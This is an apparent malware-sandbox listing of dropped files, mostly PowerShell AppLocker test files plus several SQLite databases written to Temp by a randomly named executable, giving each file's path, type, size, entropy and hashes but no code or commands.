Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5tjcenv.v4k.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nopshewn.dub.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nx3e50mp.rsi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nxsohdwk.x45.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oehlcvfs.hia.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osi4gwe4.53q.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovqk1u40.frd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkuuxs5a.c5o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc3rrzg0.zpu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdmfybet.lb2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qntq53zg.u2t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r2wzsjpb.tvk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcgrrvth.s5o.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtmoevxg.fqy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tryiemyr.4k3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubvnm14z.lhk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vh43qalg.a1c.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vum1m4zh.vdc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wa4t4l3v.rok.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wdihydfj.4uk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrm4u3al.st5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x2vezy3i.jrg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjdnosul.f3j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xttqn0yr.krh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwvudrgt.wa2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywf5tszp.hrl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyzd152r.wrj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zaltrm3f.nb3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqquy0kn.nau.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\ajkSNdZNEm

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\b7vFFnQUnG

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bCjwtTB9zS

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\bKQ1stZhtk

Download File

Process:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
